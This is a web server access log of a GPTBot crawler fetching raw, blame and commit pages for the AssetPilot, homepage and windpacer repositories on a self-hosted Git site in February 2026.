+[17/Feb/2026:13:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14174] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14141] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" +[17/Feb/2026:13:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" [Client 74.7.227.38] [Length 10723] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" +[17/Feb/2026:13:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10905] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12204] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14170] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10897] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12199] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14171] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66161] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71969] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" +[17/Feb/2026:13:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" +[17/Feb/2026:13:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" +[17/Feb/2026:13:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66200] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66199] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11747] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11747] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" +[17/Feb/2026:13:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10895] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11867] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" +[17/Feb/2026:13:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13327] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11519] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10494] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 12498] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" +[17/Feb/2026:13:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11597] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10429] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 12527] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" +[17/Feb/2026:13:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71998] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71999] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" +[17/Feb/2026:13:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" +[17/Feb/2026:13:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11538] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" +[17/Feb/2026:13:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11033] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" +[17/Feb/2026:13:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11647] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" +[17/Feb/2026:13:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11037] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" +[17/Feb/2026:13:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 20271] [Gzip 5.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" +[17/Feb/2026:13:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13589] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 